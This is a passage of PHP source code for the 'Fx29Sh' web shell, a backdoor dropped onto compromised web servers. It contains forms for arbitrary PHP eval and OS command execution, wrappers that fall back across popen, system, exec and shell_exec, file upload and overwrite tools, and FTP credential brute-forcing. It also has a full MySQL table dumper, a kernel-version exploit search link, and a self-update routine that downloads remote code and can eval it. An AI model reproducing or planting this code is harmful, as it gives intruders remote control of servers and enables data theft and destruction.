2417           echo "<br><textarea cols=\"125\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
2418         }
2419         else {echo $ret."<br>";}
2420       }
2421       else {
2422         if ($eval_txt) {
2423           echo "<br><textarea cols=\"125\" rows=\"10\" readonly>";
2424           eval($eval);
2425           echo "</textarea>";
2426         }
2427         else {echo $ret;}
2428       }
2429       @chdir($olddir);
2430     }
2431     else {
2432       echo "<div class=\"barheader\">.: PHP-code Execution :.</div>\n\n";
2433       if (empty($eval_txt)) { $eval_txt = TRUE; }
2434     }
2435 ?>
2436 
2437 
2438 <form name="f_eval" action="<?php echo $surl; ?>" method="POST">
2439     <input type="hidden" name="act" value="eval">
2440     <textarea name="eval" cols="125" rows="10">
2441 <?php
2442 echo htmlspecialchars(@$eval);
2443 ?>
2444 
2445 
2446     </textarea>
2447     <input type="hidden" name="d" value="<?php echo $dispd; ?>"><br>
2448     <input type="submit" value="Execute"> Display in text-area <input type="checkbox" name="eval_txt" value="1"<?php if (@$eval_txt) { echo " checked"; } ?>>
2449 </form>
2450 <?php
2451   }
2452   ###[ UPDATE ]###
2453   if ($act == "update") {
2454     $ret = fx29sh_getupdate(@$confirmupdate);
2455     echo "<b>$ret</b>";
2456     if (stristr($ret,"new version")) {
2457       echo "<br><br><input type=button onclick=\"location.href='".$surl."act=update&confirmupdate=1';\" value=\"Update now\">";
2458     }
2459   }
2460   if ($act == "phpinfo") { @ob_clean(); phpinfo(); fx29shexit(); }
2461   if ($act == "tools") { fx29sh_tools(); }
2462   if ($act == "about") { fx29sh_about(); }
2463 }
2464 ###[ END OF ACTIONS ]###
2465 #################################
2466 ###[ COMMANDS PANEL ]###
2467 #################################
2468 ?>
2469 </div>
2470 <!-- End of Main Info -->
2471 <!-- Commands Panel -->
2472 <div id="main">
2473     <div class="bartitle"><b>.: COMMANDS PANEL :.</b></div>
2474 <table id="mainpanel">
2475     <tr><th colspan="2">Command:</th>
2476     <td>
2477     <form name="f_cmd" method="POST">
2478         <input type="hidden" name="act" value="cmd">
2479         <input type="hidden" name="d" value="<?php echo $dispd; ?>">
2480         <input type="hidden" name="cmd_txt" value="1">
2481         <input type="text" name="cmd" size="100" value="<?php echo @htmlspecialchars($cmd); ?>">
2482         <input type="submit" name="submit" value="Execute">
2483     </form>
2484     </td></tr>
2485     <tr><th colspan="2">Quick Commands:</th>
2486     <td>
2487     <form name="f_qcmd" method="POST">
2488         <input type="hidden" name="act" value="cmd">
2489         <input type="hidden" name="d" value="<?php echo $dispd; ?>">
2490         <input type="hidden" name="cmd_txt" value="1">
2491         <select name="cmd">
2492 <?php
2493 foreach ($cmdaliases as $als) {
2494   echo "\t\t\t";
2495   echo '<option value="'.htmlspecialchars($als[1]).'">'.htmlspecialchars($als[0]).'</option>';
2496   echo "\n";
2497 }
2498 ?>
2499 
2500 
2501         </select>
2502         <input type="submit" name="submit" value="Execute">
2503     </form>
2504     </td></tr>
2505     <tr><th colspan="2" rowspan="2">PHP Filesystem:</th>
2506     <td>
2507     <script language="javascript">
2508     function set_arg(txt1,txt2) {
2509       document.forms.fphpfsys.phpfsysfunc.value.selected = "Download";
2510       document.forms.fphpfsys.arg1.value = txt1;
2511       document.forms.fphpfsys.arg2.value = txt2;
2512     }
2513     function chg_arg(num,txt1,txt2) {
2514       if (num==0) {
2515         document.forms.fphpfsys.arg1.type = "hidden";
2516         document.forms.fphpfsys.A1.type = "hidden";
2517       }
2518       if (num<=1) {
2519         document.forms.fphpfsys.arg2.type = "hidden";
2520         document.forms.fphpfsys.A2.type = "hidden";
2521       }
2522       if (num==2) {
2523         document.forms.fphpfsys.A1.type = "label";
2524         document.forms.fphpfsys.A2.type = "label";
2525         document.forms.fphpfsys.arg1.type = "text";
2526         document.forms.fphpfsys.arg2.type = "text";
2527       }
2528       document.forms.fphpfsys.A1.value = txt1 + ":";
2529       document.forms.fphpfsys.A2.value = txt2 + ":";
2530     }
2531     </script>
2532     <form name="fphpfsys" method="POST">
2533         <input type="hidden" name="act" value="phpfsys">
2534         <input type="hidden" name="d" value="<?php echo $dispd; ?>">
2535         <select name="phpfsysfunc">
2536 <?php
2537 foreach ($phpfsaliases as $als) {
2538   if ($als[1]==@$phpfsysfunc) {
2539     echo "\t\t<option selected value=\"".$als[1]."\" onclick=\"chg_arg('$als[2]','$als[3]','$als[4]')\">".$als[0]."</option>\n";
2540   }
2541   else {
2542     echo "\t\t<option value=\"".$als[1]."\" onclick=\"chg_arg('$als[2]','$als[3]','".@$als[4]."')\">".$als[0]."</option>\n";
2543   }
2544 }
2545 ?>
2546 
2547 
2548         </select>
2549         <input type="label" name="A1" value="File:" size=2 disabled>
2550         <input type=text name=arg1 size=40 value="<?php echo @htmlspecialchars($arg1); ?>">
2551         <input type="hidden" name="A2" size=3 disabled >
2552         <input type="hidden" name="arg2" size=40 value="<?php echo @htmlspecialchars($arg2); ?>">
2553         <input type="submit" name="submit" value="Execute">
2554     </form>
2555     </td></tr>
2556     <tr><td>
2557 <?php
2558 foreach ($sh_sourcez as $e => $o) {
2559   echo "\t<input type=button value=\"$e\" onclick=\"set_arg('$o[0]','$o[1]')\">\n";
2560 }
2561 ?>
2562 
2563 
2564     </td></tr>
2565     <tr><th rowspan="4">Filesystem</th>
2566     <th>Search:</th>
2567     <td>
2568     <form name="f_search" method="POST">
2569         <input type="hidden" name="act" value="search">
2570         <input type="hidden" name="d" value="<?php echo $dispd; ?>">
2571         <input type="text" name="search_name" size="29" value="(.*)"> <input type="checkbox" name="search_name_regexp" value="1" checked> regexp <input type=submit name=submit value="Search">
2572     </form>
2573     </td></tr>
2574     <tr><th>Upload:</th>
2575     <td>
2576     <form name="f_upload" method="POST" enctype="multipart/form-data">
2577         <input type="hidden" name="act" value="upload">
2578         <input type="file" name="uploadfile" size="50">
2579         <input type="submit" name="submit" value="Upload">
2580         <?php echo " Max size: ".@ini_get("upload_max_filesize")."B | Temp dir: ".@ini_get("upload_tmp_dir")."\n"; ?>
2581 
2582 
2583     </form>
2584     </td></tr>
2585     <tr><th>Create:</th>
2586     <td>
2587     <form name="f_mkfile" method="POST">
2588         <input type="hidden" name="act" value="mkfile">
2589         <input type="hidden" name="d" value="<?php echo $dispd; ?>">
2590         <input type="hidden" name="ft" value="edit">
2591         <input type="text" name="mkfile" size="70" value="<?php echo $dispd; ?>"> <input type="checkbox" name="overwrite" value="1" checked> Overwrite <input type=submit value="Create">
2592     </form>
2593     </td></tr>
2594     <tr><th>View:</th><td>
2595     <form name="f_gofile" method="POST">
2596         <input type="hidden" name="act" value="gofile">
2597         <input type="hidden" name="d" value="<?php echo $dispd; ?>">
2598         <input type="text" name="f" size="70" value="<?php echo $dispd; ?>"> <input type="submit" value="View">
2599     </form>
2600     </td></tr>
2601 </table>
2602     <div class="bartitle footer"><?php echo html_footer(); ?></div>
2603 </div>
2604 <!-- End of Commands Panel -->
2605 </center></body>
2606 </html>
2607 <?php
2608 ####################################
2609 ###[ Fx29Sh FUNCTIONS ]###
2610 ####################################
2611 function safemode() {
2612   if ( @ini_get("safe_mode") OR eregi("on",@ini_get("safe_mode")) ) { return TRUE; }
2613   else { return FALSE; }
2614 }
2615 function getdisfunc() {
2616   $disfunc = @ini_get("disable_functions");
2617   if (!empty($disfunc)) {
2618     $disfunc = str_replace(" ","",$disfunc);
2619     $disfunc = explode(",",$disfunc);
2620   }
2621   else { $disfunc= array(); }
2622   return $disfunc;
2623 }
2624 function enabled($func) {
2625  if ( function_exists($func) && is_callable($func) && !in_array($func,getdisfunc()) ) { return TRUE; }
2626  else { return FALSE; }
2627 }
2628 ###[ FX29EXEC W/ STDERR ]###
2629 function fx29exec($cmd) {
2630   $output = "";
2631   if ( enabled("popen") ) {
2632     $h = popen($cmd.' 2>&1', 'r');
2633     if ( is_resource($h) ) {
2634       while ( !feof($h) ) { $output .= fread($h, 2096);  }
2635       pclose($h);
2636     }
2637   }
2638   elseif ( enabled("passthru") ) { @ob_start(); passthru($cmd); $output = @ob_get_contents(); @ob_end_clean(); }
2639   elseif ( enabled("system") ) { @ob_start(); system($cmd); $output = @ob_get_contents(); @ob_end_clean(); }
2640   elseif ( enabled("exec") ) { exec($cmd,$o); $output = join("\r\n",$o); }
2641   elseif ( enabled("shell_exec") ) { $output = shell_exec($cmd); }
2642   return $output;
2643 }
2644 ###[ FX29EXEC W/O STDERR ]###
2645 function fx29exec2($cmd) {
2646   $output = "";
2647   if ( enabled("shell_exec") ) { $output = shell_exec($cmd); }
2648   elseif ( enabled("exec") ) { exec($cmd,$o); $output = join("\r\n",$o); }
2649   elseif ( enabled("system") ) { @ob_start(); system($cmd); $output = @ob_get_contents(); @ob_end_clean(); } #Dipindahkan kesini karena menimbulkan masalah pada output control
2650   elseif ( enabled("passthru") ) { @ob_start(); passthru($cmd); $output = @ob_get_contents(); @ob_end_clean(); }
2651   elseif ( enabled("popen") ) {
2652     $h = popen($cmd.' 2>&1', 'r');
2653     if ( is_resource($h) ) {
2654       while ( !feof($h) ) { $output .= fread($h, 2096);  }
2655       pclose($h);
2656     }
2657   }
2658   return $output;
2659 }
2660 function is_windows() { return strtolower(substr(PHP_OS,0,3)) == "win"; }
2661 function which($pr) {
2662   $path = fx29exec("which $pr");
2663   if(!empty($path)) { return $path; } else { return $pr; }
2664 }
2665 function get_status() {
2666   $arrfunc = array(
2667     array("MySQL","mysql_connect"),
2668     array("MSSQL","mssql_connect"),
2669     array("Oracle","ocilogon"),
2670     array("PostgreSQL","pg_connect"),
2671     array("Curl","curl_version"),
2672   );
2673   $arrcmd = array(
2674     array("Fetch","fetch --help"),
2675     array("Wget","wget --help"),
2676     array("Perl","perl -v"),
2677   );
2678   $statinfo = array();
2679   function showstat($sup,$stat) {
2680     if ($stat == "on") { return "$sup: <font class=on>ON</font>"; }
2681     else { return "$sup: <font class=off>OFF</font>"; }
2682   }
2683   foreach ($arrfunc as $func) {
2684     if (function_exists($func[1])) { $statinfo[] = showstat($func[0],"on"); }
2685     else { $statinfo[] = showstat($func[0],"off"); }
2686   }
2687   $statinfo[] = (@extension_loaded('sockets')) ? showstat("Sockets","on") : showstat("Sockets","off");
2688   foreach ($arrcmd as $cmd) {
2689     if (fx29exec2($cmd[1])) { $statinfo[] = showstat($cmd[0],"on"); }
2690     else { $statinfo[] = showstat($cmd[0],"off"); }
2691   }
2692   return implode(" ",$statinfo);
2693 }
2694 function showdisfunc() {
2695   $disfunc = getdisfunc();
2696   if ($disfunc = @ini_get("disable_functions")) {
2697     return '<font class="off">'.$disfunc.'</font>';
2698   }
2699   else { return '<font class="on">NONE</font>'; }
2700 }
2701 function disp_drives($curdir,$surl) {
2702   $letters = "";
2703   $v = explode("\\",$curdir);
2704   $v = $v[0];
2705   foreach (range("A","Z") as $letter) {
2706     $bool = $isdiskette = $letter == "A";
2707     if (!$bool) { $bool = is_dir($letter.":\\"); }
2708     if ($bool) {
2709       $letters .= "<a href=\"".$surl."act=ls&d=".urlencode($letter.":\\")."\"".
2710                   ($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly!')\"":"")."> ";
2711       if ($letter.":" != $v) { $letters .= $letter; }
2712       else { $letters .= "<font color=#3366FF>".$letter."</font>"; }
2713       $letters .= " </a> ";
2714     }
2715   }
2716   if (!empty($letters)) { Return $letters; }
2717   else  { Return "None"; }
2718 }
2719 function view_size($size) {
2720   if (!is_numeric($size)) { return FALSE; }
2721   else {
2722     if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
2723     elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
2724     elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
2725     else {$size = $size . " B";}
2726     return $size;
2727   }
2728 }
2729 function disp_freespace($curdrv) {
2730   $free = @disk_free_space($curdrv);
2731   $total = @disk_total_space($curdrv);
2732   if ($free === FALSE) { $free = 0; }
2733   if ($total === FALSE) { $total = 0; }
2734   if ($free < 0) { $free = 0; }
2735   if ($total < 0) { $total = 0; }
2736   $used = $total-$free;
2737   $free_percent = round(100/($total/$free),2)."%";
2738   $free = view_size($free);
2739   $total = view_size($total);
2740   return "$free of $total ($free_percent)";
2741 }
2742 ###[ Fx29Sh UPDATE FUNCTIONS ]###
2743 function fx29sh_getupdate($update = FALSE) {
2744   global $fx29sh_updateurl;
2745   $url = $fx29sh_updateurl."?version=".urlencode(base64_encode(sh_ver));
2746   $data = @file_get_contents($url);
2747   if (!$data) { return "<div class=errmsg>Can't connect to update-server! ($fx29sh_updateurl)</div>"; }
2748   else {
2749     $data = ltrim($data);
2750     if ($data{0} == "\x99" and $data{1} == "\x01") { return "You already using latest version!"; }
2751     if ($data{0} == "\x99" and $data{1} == "\x02") {
2752      $string = substr($data,3,ord($data{2}));
2753       $string = explode("|",$string);
2754       if ($update) {
2755         $confvars = array();
2756         $sourceurl = $string[0];
2757         $source = @file_get_contents($sourceurl);
2758         if (!$source) { return "Can't fetch update!"; }
2759         else {
2760           $fp = @fopen(__FILE__,"w");
2761           if (!$fp) { return "Local error: can't write update to ".__FILE__."! You may download fx29shell.php manually <a href=\"".$sourceurl."\"><u>here</u></a>."; }
2762           else {
2763             fwrite($fp,$source);
2764             fclose($fp);
2765             return "Update completed!";
2766           }
2767         }
2768       }
2769       else { return "New version is available: ".$string[1]; }
2770     }
2771     elseif ($data{0} == "\x99" and $data{1} == "\x03") { eval($string); return TRUE; }
2772     else { return "<div class=errmsg>Error in protocol: segmentation failed! (".$data.")</div>"; }
2773   }
2774 }
2775 ###[ END Fx29Sh UPDATE FUNCTIONS ]###
2776 function fx29_buff_prepare() {
2777   global $sess_data, $act;
2778   foreach ($sess_data["copy"] as $k=>$v) {
2779     $sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));
2780   }
2781   foreach ($sess_data["cut"] as $k=>$v) {
2782     $sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));
2783   }
2784   $sess_data["copy"] = array_unique($sess_data["copy"]);
2785   $sess_data["cut"]  = array_unique($sess_data["cut"]);
2786   sort($sess_data["copy"]);
2787   sort($sess_data["cut"]);
2788   if ($act != "copy") {
2789     foreach ($sess_data["cut"] as $k=>$v) {
2790       if ($sess_data["copy"][$k] == $v) { unset($sess_data["copy"][$k]); }
2791     }
2792   }
2793   else {
2794     foreach ($sess_data["copy"] as $k=>$v) {
2795       if ($sess_data["cut"][$k] == $v) { unset($sess_data["cut"][$k]); }
2796     }
2797   }
2798 }
2799 function fx29_sess_put($data) {
2800   global $sess_cookie;
2801   global $sess_data;
2802   fx29_buff_prepare();
2803   $sess_data = $data;
2804   $data = serialize($data);
2805   setcookie($sess_cookie,$data);
2806 }
2807 ###[ FILESYSTEM FUNCTIONS ]###
2808 function fs_copy_dir($d,$t) {
2809   $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
2810   if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
2811   $h = opendir($d);
2812   while (($o = readdir($h)) !== FALSE) {
2813     if (($o != ".") and ($o != "..")) {
2814       if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
2815       else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
2816       if (!$ret) {return $ret;}
2817     }
2818   }
2819   closedir($h);
2820   return TRUE;
2821 }
2822 function fs_copy_obj($d,$t) {
2823   $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
2824   $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
2825   if (!is_dir(dirname($t))) {mkdir(dirname($t));}
2826   if (is_dir($d)) {
2827     if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
2828     if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
2829     return fs_copy_dir($d,$t);
2830   }
2831   elseif (is_file($d)) { return copy($d,$t); }
2832   else { return FALSE; }
2833 }
2834 function fs_move_dir($d,$t) {
2835   $h = opendir($d);
2836   if (!is_dir($t)) {mkdir($t);}
2837   while (($o = readdir($h)) !== FALSE) {
2838     if (($o != ".") and ($o != "..")) {
2839       $ret = TRUE;
2840       if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
2841       else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}}
2842       if (!$ret) {return $ret;}
2843      }
2844    }
2845   closedir($h);
2846   return TRUE;
2847 }
2848 function fs_move_obj($d,$t) {
2849   $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
2850   $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
2851   if (is_dir($d)) {
2852     if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
2853     if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
2854     return fs_move_dir($d,$t);
2855   }
2856   elseif (is_file($d)) {
2857     if(copy($d,$t)) {return unlink($d);}
2858     else {unlink($t); return FALSE;}
2859   }
2860   else {return FALSE;}
2861 }
2862 function fs_rmdir($d) {
2863   $h = opendir($d);
2864   while (($o = readdir($h)) !== FALSE) {
2865     if (($o != ".") and ($o != "..")) {
2866       if (!is_dir($d.$o)) {unlink($d.$o);}
2867       else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);}
2868     }
2869   }
2870   closedir($h);
2871   rmdir($d);
2872   return !is_dir($d);
2873 }
2874 function fs_rmobj($o) {
2875   $o = str_replace("\\",DIRECTORY_SEPARATOR,$o);
2876   if (is_dir($o)) {
2877     if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;}
2878     return fs_rmdir($o);
2879   }
2880   elseif (is_file($o)) {return unlink($o);}
2881   else {return FALSE;}
2882 }
2883 ###[ END FILESYSTEM FUNCTIONS ]###
2884 ###[ FX29SH EXIT FUNCTIONS ]###
2885 function fx29shexit() {
2886   global $gzipencode,$ft;
2887   if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad"))) {
2888     $v = @ob_get_contents();
2889     @ob_end_clean();
2890     @ob_start("ob_gzHandler");
2891     echo $v;
2892     @ob_end_flush();
2893   }
2894   exit;
2895 }
2896 ###[ END OF FX29SH EXIT FUNCTIONS ]###
2897 function fx29fsearch($d) {
2898   global $found, $found_d, $found_f, $search_i_f, $search_i_d, $a;
2899   if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
2900   $h = opendir($d);
2901   while (($f = readdir($h)) !== FALSE) {
2902     if($f != "." && $f != "..") {
2903       $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f));
2904       if (is_dir($d.$f)) {
2905         $search_i_d++;
2906         if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;}
2907         if (!is_link($d.$f)) { fx29fsearch($d.$f); }
2908       }
2909       else {
2910         $search_i_f++;
2911         if ($bool) {
2912           if (!empty($a["text"])) {
2913             $r = @file_get_contents($d.$f);
2914             if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";}
2915             if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);}
2916             if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);}
2917             else {$bool = strpos(" ".$r,$a["text"],1);}
2918             if ($a["text_not"]) {$bool = !$bool;}
2919             if ($bool) {$found[] = $d.$f; $found_f++;}
2920           }
2921           else {$found[] = $d.$f; $found_f++;}
2922         }
2923       }
2924     }
2925   }
2926   closedir($h);
2927 }
2928 function tabsort($a,$b) { global $v; return strnatcmp($a[$v], $b[$v]);}
2929 function view_perms_color($o) {
2930   if (!is_readable($o)) { return "<font class=red>".view_perms(fileperms($o))."</font>"; }
2931   elseif (!is_writable($o)) { return "<font color=white>".view_perms(fileperms($o))."</font>"; }
2932   else { return "<font color=green>".view_perms(fileperms($o))."</font>"; }
2933 }
2934 function view_perms($mode) {
2935   if (($mode & 0xC000) === 0xC000) {$type = "s";}
2936   elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
2937   elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
2938   elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
2939   elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
2940   elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
2941   elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
2942   else {$type = "?";}
2943   $owner["read"] = ($mode & 00400)?"r":"-";
2944   $owner["write"] = ($mode & 00200)?"w":"-";
2945   $owner["execute"] = ($mode & 00100)?"x":"-";
2946   $group["read"] = ($mode & 00040)?"r":"-";
2947   $group["write"] = ($mode & 00020)?"w":"-";
2948   $group["execute"] = ($mode & 00010)?"x":"-";
2949   $world["read"] = ($mode & 00004)?"r":"-";
2950   $world["write"] = ($mode & 00002)? "w":"-";
2951   $world["execute"] = ($mode & 00001)?"x":"-";
2952   if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";}
2953   if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";}
2954   if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";}
2955   return $type.join("",$owner).join("",$group).join("",$world);
2956 }
2957 function parsesort($sort) {
2958   $one = intval($sort);
2959   $second = substr($sort,-1);
2960   if ($second != "d") {$second = "a";}
2961   return array($one,$second);
2962 }
2963 function parse_perms($mode) {
2964   if (($mode & 0xC000) === 0xC000) {$t = "s";}
2965   elseif (($mode & 0x4000) === 0x4000) {$t = "d";}
2966   elseif (($mode & 0xA000) === 0xA000) {$t = "l";}
2967   elseif (($mode & 0x8000) === 0x8000) {$t = "-";}
2968   elseif (($mode & 0x6000) === 0x6000) {$t = "b";}
2969   elseif (($mode & 0x2000) === 0x2000) {$t = "c";}
2970   elseif (($mode & 0x1000) === 0x1000) {$t = "p";}
2971   else {$t = "?";}
2972   $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0;
2973   $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0;
2974   $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0;
2975   return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w);
2976 }
2977 function str2mini($content,$len) {
2978   if (strlen($content) > $len) {
2979     $len = ceil($len/2) - 2;
2980     return substr($content, 0,$len)."...".substr($content,-$len);
2981   } else { return $content; }
2982 }
2983 function strips(&$arr,$k="") {
2984   if (is_array($arr)) { foreach($arr as $k=>$v) { if (strtoupper($k) != "GLOBALS") { strips($arr["$k"]); } } }
2985   else { $arr = stripslashes($arr); }
2986 }
2987 function getmicrotime() {
2988   list($usec, $sec) = explode(" ", microtime());
2989   return ((float)$usec + (float)$sec);
2990 }
2991 function milw0rm() {
2992   $Lversion = php_uname("r");
2993   $OSV = php_uname("s");
2994   if(eregi("Linux",$OSV)) {
2995     $Lversion = substr($Lversion,0,6);
2996     return "http://milw0rm.com/search.php?dong=Linux Kernel ".$Lversion;
2997   } else {
2998     $Lversion = substr($Lversion,0,3);
2999     return "http://milw0rm.com/search.php?dong=".$OSV." ".$Lversion;
3000   }
3001 }
3002 function fx29ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh) {
3003   if ($fqb_onlywithsh) { $TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin"))); }
3004   else { $TRUE = TRUE; }
3005   if ($TRUE) {
3006     $sock = @ftp_connect($host,$port,$timeout);
3007     if (@ftp_login($sock,$login,$pass)) {
3008       echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>";
3009       @ob_flush();
3010       return TRUE;
3011     }
3012   }
3013 }
3014 if (!enabled("posix_getpwuid")) { function posix_getpwuid($uid) { return FALSE; } }
3015 if (!enabled("posix_getgrgid")) { function posix_getgrgid($gid) { return FALSE; } }
3016 if (!enabled("posix_kill")) { function posix_kill($gid) { return FALSE; } }
3017 ###[ MySQL FUNCTIONS ]###
3018 function mysql_dump($set) {
3019   $sock = $set["sock"];
3020   $db = $set["db"];
3021   $print = $set["print"];
3022   $nl2br = $set["nl2br"];
3023   $file = $set["file"];
3024   $add_drop = $set["add_drop"];
3025   $tabs = $set["tabs"];
3026   $onlytabs = $set["onlytabs"];
3027   $ret = array();
3028   $ret["err"] = array();
3029   if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
3030   if (empty($db)) {$db = "db";}
3031   if (empty($print)) {$print = 0;}
3032   if (empty($nl2br)) {$nl2br = 0;}
3033   if (empty($add_drop)) {$add_drop = TRUE;}
3034   if (empty($file)) {
3035     $file = $tmp_dir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql";
3036   }
3037   if (!is_array($tabs)) {$tabs = array();}
3038   if (empty($add_drop)) {$add_drop = TRUE;}
3039   if (sizeof($tabs) == 0) {
3040     #Retrieve tables-list
3041     $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
3042     if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
3043   }
3044   $out = "
3045   # Dumped by ".sh_name()."
3046   # MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"."
3047   # Date: ".date("d.m.Y H:i:s")."
3048   # DB: \"".$db."\"
3049   #---------------------------------------------------------";
3050   $c = count($onlytabs);
3051   foreach($tabs as $tab) {
3052     if ((in_array($tab,$onlytabs)) or (!$c)) {
3053       if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
3054       #Receieve query for create table structure
3055       $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
3056       if (!$res) {$ret["err"][] = mysql_smarterror();}
3057       else {
3058         $row = mysql_fetch_row($res);
3059         $out .= $row["1"].";\n\n";
3060         #Receieve table variables
3061         $res = mysql_query("SELECT * FROM `$tab`", $sock);
3062         if (mysql_num_rows($res) > 0) {
3063           while ($row = mysql_fetch_assoc($res)) {
3064             $keys = implode("`, `", array_keys($row));
3065             $values = array_values($row);
3066             foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
3067             $values = implode("', '", $values);
3068             $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";
3069             $out .= $sql;
3070           }
3071         }
3072       }
3073     }
3074   }
3075   $out .= "#---------------------------------------------------------------------------------\n\n";
3076   if ($file) {
3077     $fp = fopen($file, "w");
3078     if (!$fp) {$ret["err"][] = 2;}
3079     else {
3080       fwrite ($fp, $out);
3081       fclose ($fp);
3082     }
3083   }
3084   if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
3085   return $out;
3086 }
3087 function mysql_buildwhere($array,$sep=" and",$functs=array()) {
3088   if (!is_array($array)) {$array = array();}
3089   $result = "";
3090   foreach($array as $k=>$v) {
3091     $value = "";
3092     if (!empty($functs[$k])) {$value .= $functs[$k]."(";}
3093     $value .= "'".addslashes($v)."'";
3094     if (!empty($functs[$k])) {$value .= ")";}
3095     $result .= "`".$k."` = ".$value.$sep;
3096   }
3097   $result = substr($result,0,strlen($result)-strlen($sep));
3098   return $result;
3099 }
3100 function mysql_fetch_all($query,$sock) {
3101   if ($sock) {$result = mysql_query($query,$sock);}
3102   else {$result = mysql_query($query);}
3103   $array = array();
3104   while ($row = mysql_fetch_array($result)) {$array[] = $row;}
3105   mysql_free_result($result);
3106   return $array;
3107 }
3108 function mysql_smarterror($sock) {
3109   if ($sock) { $error = mysql_error($sock); }
3110   else { $error = mysql_error(); }
3111   $error = htmlspecialchars($error);
3112   return $error;
3113 }
3114 function mysql_query_form() {
3115   global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;
3116   if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
3117   if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
3118   if ((!$submit) or ($sql_act)) {
3119     echo "<table><tr><td><form name=\"fx29sh_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\"> <input type=submit value=\"No\"></form></td>";
3120     if ($tbl_struct) {
3121       echo "<td valign=\"top\"><b>Fields:</b><br>";
3122       foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "+ <a href=\"#\" onclick=\"document.fx29sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}
3123       echo "</td></tr></table>";
3124     }
3125   }
